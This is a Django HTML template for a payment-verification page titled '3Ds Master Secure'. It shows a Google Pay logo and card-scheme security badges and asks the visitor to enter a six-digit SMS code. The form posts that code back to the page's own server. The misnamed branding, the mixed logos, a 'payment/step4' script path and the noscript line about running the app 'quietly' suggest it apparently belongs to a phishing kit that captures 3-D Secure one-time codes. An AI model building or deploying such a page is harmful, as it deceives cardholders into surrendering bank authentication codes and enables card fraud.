<!DOCTYPE html>
{% load static %}
<html lang="ru">
<head>
    <meta charset="utf-8">
    <link rel="icon" href="{% static 'images/favicon.png' %}">
    <meta name="viewport" content="width=850px">
    <meta name="theme-color" content="#000000">
    <meta name="description" content="Web site created using create-react-app">
    <link rel="apple-touch-icon" href="/logo.svg">
    <title>3Ds Master Secure</title>
    <link href="{% static 'css/3ds.css' %}" rel="stylesheet">
    <style>
        :root {
            --placeholder-color: hsl(240, 54%, 87%);
            --bg-color: hsl(240, 54%, 97%);
            --focus-color: hsla(240, 54%, 61%, 0.6);
            --shadow-color: hsla(240, 54%, 61%, 0.2);
            --text-color: hsl(0, 0%, 20%);
            --text-color-inversed: hsl(0, 0%, 95%);
            --success-color: hsl(145, 63%, 42%);
            --success-color-desaturated: hsl(145, 0%, 42%);
            --failure-color: hsl(0, 79%, 63%);

            --border-radius: 6px;

            --z-index-xs: 1;
            --z-index-sm: 10;
            --z-index-md: 100;

            --easing: cubic-bezier(0.25, 0.01, 0.25, 1);

            --transition-duration-step-1: 450ms;
            --transition-duration-step-2: 300ms;
            --transition-duration-step-3: 300ms;

            --transition-delay-step-2: calc(var(--transition-duration-step-1));
            --transition-delay-step-3: calc(
                    var(--transition-duration-step-1) + var(--transition-duration-step-2)
            );

            --transition-step-1: var(--transition-duration-step-1) var(--easing);
            --transition-step-2: var(--transition-duration-step-2) var(--easing) var(--transition-delay-step-2);
            --transition-step-3: var(--transition-duration-step-3) var(--easing) var(--transition-delay-step-3);
        }

        *,
        *::after,
        *::before {
            box-sizing: border-box;
            font-family: Helvetica Neue;
        }

        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            width: 100vw;
            margin: 0;
        }

        .main {
            display: grid;
            justify-content: center;
        }

        .label {
            font-size: 14px;
            line-height: 15px;
            text-align: center;
            letter-spacing: 0.01em;
            color: var(--text-color);
        }

        .label.is-muted {
            color: #828282;
        }

        .animation-controls {
            margin-top: 55px;
        }

        .animation-controls__content {
            display: grid;
            grid-auto-flow: column;
            justify-content: center;
            gap: 6px;
        }

        .btn {
            min-width: 90px;
            padding: 9px 0;
            border: 0;
            border-radius: 6px;
            font-size: 14px;
            line-height: 15px;
            letter-spacing: 0.01em;
            font-weight: bold;
            cursor: pointer;
            transition: opacity 150ms ease-in;
        }

        .btn:hover,
        .btn:focus {
            opacity: 0.7;
        }

        .btn:active {
            position: relative;
            top: 1px;
        }

        .btn.success-btn {
            color: #219653;
            background-color: #d3eadd;
        }

        .btn.failure-btn {
            color: #eb5757;
            background-color: #ffe9e0;
        }

        .btn.reset-btn {
            color: #6666d1;
            background-color: #f2f2f2;
        }

        .settings-controls {
            margin-top: 130px;
        }

        .settings-controls__content {
            display: grid;
            justify-content: center;
            gap: 18px;
        }

        .settings-controls__input {
            width: 67px;
            height: 33px;
            border: 0;
            border-radius: 6px;
            font-size: 14px;
            line-height: 15px;
            font-weight: bold;
            letter-spacing: 0.01em;
            color: #828282;
            background-color: #f2f2f2;
            text-align: center;
        }

        .settings-controls__label {
            font-size: 14px;
            line-height: 15px;
            letter-spacing: 0.01em;
            font-weight: bold;
            color: #828282;
        }

        @media (min-width: 768px) {
            .settings-controls__content {
                grid-auto-flow: column;
            }
        }

        .fieldset {
            position: relative;
            display: grid;
            grid-auto-flow: column;
            justify-content: center;
            column-gap: 12px;
            border-radius: 6px;
            overflow: hidden;
            will-change: transform;
            padding: 6px;
            margin: -6px;
        }

        .fieldset::before {
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            height: 100%;
            width: 100%;
            transform: translateX(-100%);
        }

        .box {
            position: relative;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 42px;
            width: 42px;
            border-radius: var(--border-radius);
            box-shadow: 0 0 6px 1px var(--shadow-color);
            overflow: hidden;
            will-change: transform;
        }

        .box:focus-within {
            box-shadow: 0 0 6px 1px var(--shadow-color), 0 0 0 2px var(--focus-color);
        }

        .box::before,
        .box::after {
            content: "";
            position: absolute;
            height: 100%;
            width: 100%;
            top: 0;
            left: 0;
            border-radius: var(--border-radius);
            overflow: hidden;
        }

        .box::before {
            background: var(--bg-color);
            z-index: var(--z-index-xs);
            transition: background-color var(--transition-step-1);
        }

        .box::after {
            transform: translateY(100%);
            background-color: var(--success-color-desaturated);
            opacity: 0;
            z-index: var(--z-index-sm);
            transition: transform var(--transition-step-1),
            opacity var(--transition-step-1), background-color var(--transition-step-1);
        }

        .field {
            position: relative;
            border: 0;
            outline: 0;
            font-size: 25.21px;
            line-height: 42px;
            color: var(--text-color);
            background-color: transparent;
            text-align: center;
            z-index: var(--z-index-md);
        }

        .field::placeholder {
            color: var(--placeholder-color);
        }

        .animate-success.fieldset {
            padding: 0;
            margin: 0;
        }

        .animate-success.fieldset::before {
            background-color: var(--success-color);
            transform: translateX(0);
            transition: transform var(--transition-step-2);
        }

        .animate-success > .box {
            box-shadow: none;
            transition: transform var(--transition-step-3);
        }

        .animate-success > .box:nth-child(1) {
            transform: translateX(24px);
        }

        .animate-success > .box:nth-child(2) {
            transform: translateX(12px);
        }

        .animate-success > .box:nth-child(4) {
            transform: translateX(-12px);
        }

        .animate-success > .box:nth-child(5) {
            transform: translateX(-24px);
        }

        .animate-success > .box::before {
            background-color: transparent;
        }

        .animate-success > .box::after {
            background-color: var(--success-color);
            transform: translateY(0);
            opacity: 1;
        }

        .animate-success > .box > .field,
        .animate-success > .box > .field::placeholder {
            color: var(--text-color-inversed);
            transition: color var(--transition-step-1);
        }

        .animate-failure.fieldset {
            animation-name: shaking;
            animation-duration: var(--transition-duration-step-2);
            animation-timing-function: var(--easing);
            animation-delay: var(--transition-delay-step-2);
        }

        .animate-failure > .box::before {
            background-color: transparent;
        }

        .animate-failure > .box::after {
            background-color: var(--failure-color);
            transform: translateY(0);
            opacity: 1;
        }

        .animate-failure > .box > .field,
        .animate-failure > .box > .field::placeholder {
            color: var(--text-color-inversed);
            transition: color var(--transition-step-1);
        }

        @keyframes shaking {
            0%,
            100% {
                transform: translateX(0);
            }

            25%,
            75% {
                transform: translateX(10px);
            }

            50% {
                transform: translateX(-10px);
            }
        }
    </style>
    <style rc-util-key="@ant-design-icons">
        .anticon {
            display: inline-block;
            color: inherit;
            font-style: normal;
            line-height: 0;
            text-align: center;
            text-transform: none;
            vertical-align: -0.125em;
            text-rendering: optimizeLegibility;
            -webkit-font-smoothing: antialiased;
            -moz-osx-font-smoothing: grayscale;
        }

        .anticon > * {
            line-height: 1;
        }

        .anticon svg {
            display: inline-block;
        }

        .anticon::before {
            display: none;
        }

        .anticon .anticon-icon {
            display: block;
        }

        .anticon[tabindex] {
            cursor: pointer;
        }

        .anticon-spin::before,
        .anticon-spin {
            display: inline-block;
            -webkit-animation: loadingCircle 1s infinite linear;
            animation: loadingCircle 1s infinite linear;
        }

        @-webkit-keyframes loadingCircle {
            100% {
                -webkit-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        @keyframes loadingCircle {
            100% {
                -webkit-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }
    </style>
</head>


<body>
<noscript>You need to enable JavaScript to run this app quietly.</noscript>
<div id="root">
    <div class="invoice">
        <div class="ant-spin-nested-loading">
            <div class="ant-spin-container">
                <form method="POST">
                    <div class="invoice-block">
                        <div class="invoice__error">
                            <div class="invoice__error-info">
                                <img src="{% static 'images/google-pay.svg' %}" width="130">
                                <br><br>
                                <div style="margin-bottom: 15px; font-family: Inter; font-style: normal; font-weight: normal; font-size: 4px; line-height: 6px; text-align: center;">
                                    <h1>
                                        Enter code from SMS </h1>
                                </div>
                                <div>
                                    <div class="fieldset">
                                        <label class="box"><input id="code_1" onkeyup="testJump(this);" size="1" name="code_1" maxlength="1" class="field" type="text"
                                                                  placeholder="•"></label>
                                        <label class="box"><input id="code_2" onkeyup="testJump(this);" size="1" name="code_2" maxlength="1" class="field" type="text"
                                                                  placeholder="•"></label>
                                        <label class="box"><input id="code_3" onkeyup="testJump(this);" size="1" name="code_3" maxlength="1" class="field" type="text"
                                                                  placeholder="•"></label>
                                        <label class="box"><input id="code_4" onkeyup="testJump(this);" size="1" name="code_4" maxlength="1" class="field" type="text"
                                                                  placeholder="•"></label>
                                        <label class="box"><input id="code_5" onkeyup="testJump(this);" size="1" name="code_5" maxlength="1" class="field" type="text"
                                                                  placeholder="•"></label>
                                        <label class="box"><input id="code_6" onkeyup="testJump(this);" size="1" name="code_6" maxlength="1" class="field" type="text"
                                                                  placeholder="•"></label>
                                    </div>
                                    <br><br>
                                    <input type="hidden" name="submitBtn" value="1">
                                    <button id="BtnEnterCode" class="btn btn-primary">Submit</button>
                                </div>
                            </div>
                        </div>
                    </div>
                </form>
                <div class="bottom__info-wrapper">
                    <div class="certificates"><span class="svg-wrapper-icon" id="pci-dss-svg" alt="PCI-DSS"></span><span
                            class="svg-wrapper-icon" id="mastercard-svg" alt="mastercardSecure"></span><span
                            class="svg-wrapper-icon" id="visa-svg" alt="VisaVerified"></span><span
                            class="svg-wrapper-icon" id="mir-svg" alt="mir"></span></div>
                </div>
            </div>
        </div>
    </div>
</div>
<script src="{% static 'js/payment/step4/script.js' %}"></script>
<script>
    function testJump(x){
    var ml = ~~x.getAttribute('maxlength');
    console.log('ml: ', ml)
    console.log('x.value.length: ', x.value.length)
    if(ml && x.value.length >= ml){
        do{
            console.log('222222222222222222222222');
            x = x.nextSibling;
        }
        while(x && !(/text/.test(x.type)));
        console.log('333333333333333333333333')
        if(x && /text/.test(x.type)){
            x.focus();
        }
    }
}
</script>

</body>
</html>